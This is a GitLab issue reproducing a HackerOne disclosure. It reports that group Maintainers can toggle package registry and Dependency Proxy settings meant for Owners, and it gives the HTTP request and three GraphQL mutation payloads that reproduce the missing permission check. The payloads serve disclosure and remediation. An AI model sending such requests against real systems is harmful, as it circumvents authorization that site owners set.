Skip to content

Group Maintainers can toggle package and registries settings

HackerOne report #1582356 by ashish_r_padelkar on 2022-05-26, assigned to GitLab Team:

Report | How To Reproduce

Report

Summary

Hello,

Group Maintainers are able to toggle the package and registries settings using this missing permission check.

Steps to reproduce

  1. Login as Group owner and go to https://gitlab.com/groups/<GroupName>/-/settings/packages_and_registries. You should be able to toggle all the settings from here.

  2. Now login as maintainer in a group and navigate to same url https://gitlab.com/groups/<GroupName>/-/settings/packages_and_registries but you wont be able to access it.

  3. Now run the below Graphql to toggle Settings for Maven packages duplicates.

POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: 1  
Content-Length: 501  
X-Gitlab-Feature-Category: package_registry  
X-Csrf-Token: 1  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36  
Content-Type: application/json  
Accept: */*  
Sec-Ch-Ua-Platform: "macOS"  
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com/groups/qqqq6/-/settings/packages_and_registries  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

[{"operationName":"updateNamespacePackageSettings","variables":{"input":{"namespacePath":"qqqq6","mavenDuplicatesAllowed":true}},"query":"mutation updateNamespacePackageSettings($input: UpdateNamespacePackageSettingsInput!) {\n  updateNamespacePackageSettings(input: $input) {\n    packageSettings {\n      mavenDuplicatesAllowed\n      mavenDuplicateExceptionRegex\n      genericDuplicatesAllowed\n      genericDuplicateExceptionRegex\n      __typename\n    }\n    errors\n    __typename\n  }\n}\n"}]

**Change namespacePath in above query

  1. Similarly below graphql will toggle Dependency Proxy 
[{"operationName":"updateDependencyProxySettings","variables":{"input":{"groupPath":"qqqq6","enabled":true}},"query":"mutation updateDependencyProxySettings($input: UpdateDependencyProxySettingsInput!) {\n  updateDependencyProxySettings(input: $input) {\n    dependencyProxySetting {\n      enabled\n      __typename\n    }\n    errors\n    __typename\n  }\n}\n"}]

Change groupPath

  1. This will toggle Clear the Dependency Proxy cache automatically 
[{"operationName":"updateDependencyProxyImageTtlGroupPolicy","variables":{"input":{"groupPath":"qqqq6","enabled":true,"ttl":90}},"query":"mutation updateDependencyProxyImageTtlGroupPolicy($input: UpdateDependencyProxyImageTtlGroupPolicyInput!) {\n  updateDependencyProxyImageTtlGroupPolicy(input: $input) {\n    dependencyProxyImageTtlPolicy {\n      enabled\n      ttl\n      __typename\n    }\n    errors\n    __typename\n  }\n}\n"}]

Change groupPath

What is the current bug behavior?

Group Maintainers are able to toggle package and registries settings

What is the expected correct behavior?

Only group owners should be able to do so!

Output of checks

This bug happens on GitLab.com

Regards,
Ashish

Impact

Group Maintainers can toggle package and registries settings

🤓 Proposed solution

Update the documentation to acknowledge the discrepancy See #364441 (comment 1018411511)

A follow-up issue to raise the permissions of the group-level APIs to owner #370471 (closed)

Edited by Michelle Torres